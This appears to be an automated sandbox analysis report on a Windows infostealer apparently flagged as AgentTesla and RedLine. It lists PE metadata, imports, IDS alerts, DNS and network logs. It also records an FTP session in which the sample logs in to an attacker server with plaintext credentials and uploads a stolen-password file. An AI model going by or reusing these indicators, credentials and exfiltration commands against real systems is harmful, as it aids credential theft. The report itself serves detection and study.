                                                  SHA256:2f089d43e47839f07590fc97fbd2bbe91f08ff02d50b3a6b7fe68f3e1a81026d
                                                  SHA512:c811d48001aade05a917e89770277a0af0a5f10639c1dd63c66d99728650c877d74f843ab4c9f57847f1654fe7240606072c51383a90811ec6aeb62ee91e2290
                                                  SSDEEP:12288:ehkDgouVA2nxKkorvdRgQriDwOIxmxiZnYQE7PJcE4aCBWGvAbhGCPvkK3X1rGs2:uRmJkcoQricOIQxiZY1iaCBtvgvLdG9J
                                                  TLSH:D825D022B5C69036C2B323B19E7FF76A963D69360336D19727C82D315EA05416B3A733
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..
                                                  Icon Hash:1733312925935517
                                                  Entrypoint:0x4165c1
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:5
                                                  OS Version Minor:0
                                                  File Version Major:5
                                                  File Version Minor:0
                                                  Subsystem Version Major:5
                                                  Subsystem Version Minor:0
                                                  Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378
                                                  Instruction
                                                  call 00007F2A352A611Bh
                                                  jmp 00007F2A3529CF8Eh
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  push ebp
                                                  mov ebp, esp
                                                  push edi
                                                  push esi
                                                  mov esi, dword ptr [ebp+0Ch]
                                                  mov ecx, dword ptr [ebp+10h]
                                                  mov edi, dword ptr [ebp+08h]
                                                  mov eax, ecx
                                                  mov edx, ecx
                                                  add eax, esi
                                                  cmp edi, esi
                                                  jbe 00007F2A3529D10Ah
                                                  cmp edi, eax
                                                  jc 00007F2A3529D2A6h
                                                  cmp ecx, 00000080h
                                                  jc 00007F2A3529D11Eh
                                                  cmp dword ptr [004A9724h], 00000000h
                                                  je 00007F2A3529D115h
                                                  push edi
                                                  push esi
                                                  and edi, 0Fh
                                                  and esi, 0Fh
                                                  cmp edi, esi
                                                  pop esi
                                                  pop edi
                                                  jne 00007F2A3529D107h
                                                  jmp 00007F2A3529D4E2h
                                                  test edi, 00000003h
                                                  jne 00007F2A3529D116h
                                                  shr ecx, 02h
                                                  and edx, 03h
                                                  cmp ecx, 08h
                                                  jc 00007F2A3529D12Bh
                                                  rep movsd
                                                  jmp dword ptr [00416740h+edx*4]
                                                  mov eax, edi
                                                  mov edx, 00000003h
                                                  sub ecx, 04h
                                                  jc 00007F2A3529D10Eh
                                                  and eax, 03h
                                                  add ecx, eax
                                                  jmp dword ptr [00416654h+eax*4]
                                                  jmp dword ptr [00416750h+ecx*4]
                                                  nop
                                                  jmp dword ptr [004166D4h+ecx*4]
                                                  nop
                                                  inc cx
                                                  add byte ptr [eax-4BFFBE9Ah], dl
                                                  inc cx
                                                  add byte ptr [ebx], ah
                                                  ror dword ptr [edx-75F877FAh], 1
                                                  inc esi
                                                  add dword ptr [eax+468A0147h], ecx
                                                  add al, cl
                                                  jmp 00007F2A37715907h
                                                  add esi, 03h
                                                  add edi, 03h
                                                  cmp ecx, 08h
                                                  jc 00007F2A3529D0CEh
                                                  rep movsd
                                                  jmp dword ptr [00000000h+edx*4]
                                                  Programming Language:
                                                  • [ C ] VS2010 SP1 build 40219
                                                  • [C++] VS2010 SP1 build 40219
                                                  • [ C ] VS2008 SP1 build 30729
                                                  • [IMP] VS2008 SP1 build 30729
                                                  • [ASM] VS2010 SP1 build 40219
                                                  • [RES] VS2010 SP1 build 40219
                                                  • [LNK] VS2010 SP1 build 40219
                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x8d41c0x154.rdata
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9328.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x820000x844.rdata
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x10000x8061c0x8080061ffce4768976fa0dd2a8f6a97b1417aFalse0.5583182605787937data6.684690148171278IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rdata0x820000xdfc00xe0000354bc5f2376b5e9a4a3ba38b682dff1False0.36085728236607145data4.799741132252136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .data0x900000x1a7580x68008033f5a38941b4685bc2299e78f31221False0.15324519230769232data2.1500715391677487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .rsrc0xab0000x93280x9400495451d7eb8326bd9fa2714869ea6de8False0.49002322635135137data5.541804843154628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                  RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                  RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                  RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                  RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                                                  RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                                                  RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
                                                  RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
                                                  RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
                                                  RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
                                                  RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                                                  RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                                                  RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                                                  RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                                                  RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                                                  RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                                                  RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                                                  RT_STRING0xb28380x4d0dataEnglishGreat Britain0.36363636363636365
                                                  RT_STRING0xb2d080x5fcdataEnglishGreat Britain0.3087467362924282
                                                  RT_STRING0xb33080x65cdataEnglishGreat Britain0.34336609336609336
                                                  RT_STRING0xb39680x388dataEnglishGreat Britain0.377212389380531
                                                  RT_STRING0xb3cf00x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                                  RT_GROUP_ICON0xb3e480x84dataEnglishGreat Britain0.6439393939393939
                                                  RT_GROUP_ICON0xb3ed00x14dataEnglishGreat Britain1.15
                                                  RT_GROUP_ICON0xb3ee80x14dataEnglishGreat Britain1.25
                                                  RT_GROUP_ICON0xb3f000x14dataEnglishGreat Britain1.25
                                                  RT_VERSION0xb3f180x19cdataEnglishGreat Britain0.5339805825242718
                                                  RT_MANIFEST0xb40b80x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581
                                                  DLLImport
                                                  WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                  VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                  WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                  COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                                  MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                  WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                  PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                  USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                                  KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
                                                  USER32.dllGetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                                                  GDI32.dllDeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                                                  COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                  ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                                                  SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                  ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                                                  OLEAUT32.dllVariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit
                                                  Language of compilation systemCountry where language is spokenMap
                                                  EnglishGreat Britain
                                                  EnglishUnited States
                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                  2025-01-11T07:01:46.494336+01002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.649726195.252.110.25321TCP
                                                  2025-01-11T07:01:47.075109+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.649738195.252.110.25365110TCP
                                                  2025-01-11T07:01:47.080748+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.649738195.252.110.25365110TCP
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Jan 11, 2025 07:01:43.164710045 CET4971680192.168.2.6208.95.112.1
                                                  Jan 11, 2025 07:01:43.169642925 CET8049716208.95.112.1192.168.2.6
                                                  Jan 11, 2025 07:01:43.169728041 CET4971680192.168.2.6208.95.112.1
                                                  Jan 11, 2025 07:01:43.170988083 CET4971680192.168.2.6208.95.112.1
                                                  Jan 11, 2025 07:01:43.175865889 CET8049716208.95.112.1192.168.2.6
                                                  Jan 11, 2025 07:01:43.643418074 CET8049716208.95.112.1192.168.2.6
                                                  Jan 11, 2025 07:01:43.692970037 CET4971680192.168.2.6208.95.112.1
                                                  Jan 11, 2025 07:01:44.583781004 CET4972621192.168.2.6195.252.110.253
                                                  Jan 11, 2025 07:01:44.588701963 CET2149726195.252.110.253192.168.2.6
                                                  Jan 11, 2025 07:01:44.588762999 CET4972621192.168.2.6195.252.110.253
                                                  Jan 11, 2025 07:01:45.185914040 CET2149726195.252.110.253192.168.2.6
                                                  Jan 11, 2025 07:01:45.186099052 CET4972621192.168.2.6195.252.110.253
                                                  Jan 11, 2025 07:01:45.190913916 CET2149726195.252.110.253192.168.2.6
                                                  Jan 11, 2025 07:01:45.389467955 CET2149726195.252.110.253192.168.2.6
                                                  Jan 11, 2025 07:01:45.389622927 CET4972621192.168.2.6195.252.110.253
                                                  Jan 11, 2025 07:01:45.394540071 CET2149726195.252.110.253192.168.2.6
                                                  Jan 11, 2025 07:01:45.669145107 CET2149726195.252.110.253192.168.2.6
                                                  Jan 11, 2025 07:01:45.669294119 CET4972621192.168.2.6195.252.110.253
                                                  Jan 11, 2025 07:01:45.674175978 CET2149726195.252.110.253192.168.2.6
                                                  Jan 11, 2025 07:01:45.872679949 CET2149726195.252.110.253192.168.2.6
                                                  Jan 11, 2025 07:01:45.872863054 CET4972621192.168.2.6195.252.110.253
                                                  Jan 11, 2025 07:01:45.877749920 CET2149726195.252.110.253192.168.2.6
                                                  Jan 11, 2025 07:01:46.075962067 CET2149726195.252.110.253192.168.2.6
                                                  Jan 11, 2025 07:01:46.076127052 CET4972621192.168.2.6195.252.110.253
                                                  Jan 11, 2025 07:01:46.080969095 CET2149726195.252.110.253192.168.2.6
                                                  Jan 11, 2025 07:01:46.279365063 CET2149726195.252.110.253192.168.2.6
                                                  Jan 11, 2025 07:01:46.279541969 CET4972621192.168.2.6195.252.110.253
                                                  Jan 11, 2025 07:01:46.284467936 CET2149726195.252.110.253192.168.2.6
                                                  Jan 11, 2025 07:01:46.485311985 CET2149726195.252.110.253192.168.2.6
                                                  Jan 11, 2025 07:01:46.486043930 CET4973865110192.168.2.6195.252.110.253
                                                  Jan 11, 2025 07:01:46.494160891 CET6511049738195.252.110.253192.168.2.6
                                                  Jan 11, 2025 07:01:46.494231939 CET4973865110192.168.2.6195.252.110.253
                                                  Jan 11, 2025 07:01:46.494335890 CET4972621192.168.2.6195.252.110.253
                                                  Jan 11, 2025 07:01:46.502549887 CET2149726195.252.110.253192.168.2.6
                                                  Jan 11, 2025 07:01:47.074889898 CET2149726195.252.110.253192.168.2.6
                                                  Jan 11, 2025 07:01:47.075109005 CET4973865110192.168.2.6195.252.110.253
                                                  Jan 11, 2025 07:01:47.075203896 CET4973865110192.168.2.6195.252.110.253
                                                  Jan 11, 2025 07:01:47.079997063 CET6511049738195.252.110.253192.168.2.6
                                                  Jan 11, 2025 07:01:47.080688000 CET6511049738195.252.110.253192.168.2.6
                                                  Jan 11, 2025 07:01:47.080748081 CET4973865110192.168.2.6195.252.110.253
                                                  Jan 11, 2025 07:01:47.130454063 CET4972621192.168.2.6195.252.110.253
                                                  Jan 11, 2025 07:01:47.278743029 CET2149726195.252.110.253192.168.2.6
                                                  Jan 11, 2025 07:01:47.333575964 CET4972621192.168.2.6195.252.110.253
                                                  Jan 11, 2025 07:02:34.490025043 CET4971680192.168.2.6208.95.112.1
                                                  Jan 11, 2025 07:02:34.495230913 CET8049716208.95.112.1192.168.2.6
                                                  Jan 11, 2025 07:02:34.495302916 CET4971680192.168.2.6208.95.112.1
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Jan 11, 2025 07:01:43.148185968 CET6068353192.168.2.61.1.1.1
                                                  Jan 11, 2025 07:01:43.155385971 CET53606831.1.1.1192.168.2.6
                                                  Jan 11, 2025 07:01:44.491708994 CET5800553192.168.2.61.1.1.1
                                                  Jan 11, 2025 07:01:44.578948021 CET53580051.1.1.1192.168.2.6
                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Jan 11, 2025 07:01:43.148185968 CET192.168.2.61.1.1.10x3d03Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                  Jan 11, 2025 07:01:44.491708994 CET192.168.2.61.1.1.10x7d59Standard query (0)ftp.jeepcommerce.rsA (IP address)IN (0x0001)false
                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Jan 11, 2025 07:01:43.155385971 CET1.1.1.1192.168.2.60x3d03No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                  Jan 11, 2025 07:01:44.578948021 CET1.1.1.1192.168.2.60x7d59No error (0)ftp.jeepcommerce.rs195.252.110.253A (IP address)IN (0x0001)false
                                                  • ip-api.com
                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.649716208.95.112.1805056C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jan 11, 2025 07:01:43.170988083 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                  Host: ip-api.com
                                                  Connection: Keep-Alive
                                                  Jan 11, 2025 07:01:43.643418074 CET175INHTTP/1.1 200 OK
                                                  Date: Sat, 11 Jan 2025 06:01:43 GMT
                                                  Content-Type: text/plain; charset=utf-8
                                                  Content-Length: 6
                                                  Access-Control-Allow-Origin: *
                                                  X-Ttl: 60
                                                  X-Rl: 44
                                                  Data Raw: 66 61 6c 73 65 0a
                                                  Data Ascii: false


                                                  TimestampSource PortDest PortSource IPDest IPCommands
                                                  Jan 11, 2025 07:01:45.185914040 CET2149726195.252.110.253192.168.2.6220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.
                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 07:01. Server port: 21.
                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 07:01. Server port: 21.220-This is a private system - No anonymous login
                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 07:01. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 07:01. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                                  Jan 11, 2025 07:01:45.186099052 CET4972621192.168.2.6195.252.110.253USER kel-bin@jeepcommerce.rs
                                                  Jan 11, 2025 07:01:45.389467955 CET2149726195.252.110.253192.168.2.6331 User kel-bin@jeepcommerce.rs OK. Password required
                                                  Jan 11, 2025 07:01:45.389622927 CET4972621192.168.2.6195.252.110.253PASS Jhrn)GcpiYQ7
                                                  Jan 11, 2025 07:01:45.669145107 CET2149726195.252.110.253192.168.2.6230 OK. Current restricted directory is /
                                                  Jan 11, 2025 07:01:45.872679949 CET2149726195.252.110.253192.168.2.6504 Unknown command
                                                  Jan 11, 2025 07:01:45.872863054 CET4972621192.168.2.6195.252.110.253PWD
                                                  Jan 11, 2025 07:01:46.075962067 CET2149726195.252.110.253192.168.2.6257 "/" is your current location
                                                  Jan 11, 2025 07:01:46.076127052 CET4972621192.168.2.6195.252.110.253TYPE I
                                                  Jan 11, 2025 07:01:46.279365063 CET2149726195.252.110.253192.168.2.6200 TYPE is now 8-bit binary
                                                  Jan 11, 2025 07:01:46.279541969 CET4972621192.168.2.6195.252.110.253PASV
                                                  Jan 11, 2025 07:01:46.485311985 CET2149726195.252.110.253192.168.2.6227 Entering Passive Mode (195,252,110,253,254,86)
                                                  Jan 11, 2025 07:01:46.494335890 CET4972621192.168.2.6195.252.110.253STOR PW_user-216554_2025_01_11_01_01_43.html
                                                  Jan 11, 2025 07:01:47.074889898 CET2149726195.252.110.253192.168.2.6150 Accepted data connection
                                                  Jan 11, 2025 07:01:47.278743029 CET2149726195.252.110.253192.168.2.6226-File successfully transferred
                                                  226-File successfully transferred226 0.204 seconds (measured here), 1.54 Kbytes per second

                                                  Click to jump to process

                                                  Click to jump to process

                                                  Click to dive into process behavior distribution

                                                  Click to jump to process

                                                  Target ID:0
                                                  Start time:01:01:39
                                                  Start date:11/01/2025
                                                  Path:C:\Users\user\Desktop\juE8dtqPkx.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\juE8dtqPkx.exe"
                                                  Imagebase:0x400000
                                                  File size:973'026 bytes
                                                  MD5 hash:BD28F9A835C67CE45B3A3CA02F6737A2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000000.00000002.2184230315.0000000002F60000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:2
                                                  Start time:01:01:40
                                                  Start date:11/01/2025
                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\Desktop\juE8dtqPkx.exe"
                                                  Imagebase:0x80000
                                                  File size:45'984 bytes
                                                  MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:3
                                                  Start time:01:01:40
                                                  Start date:11/01/2025
                                                  Path:C:\Users\user\Desktop\juE8dtqPkx.exe
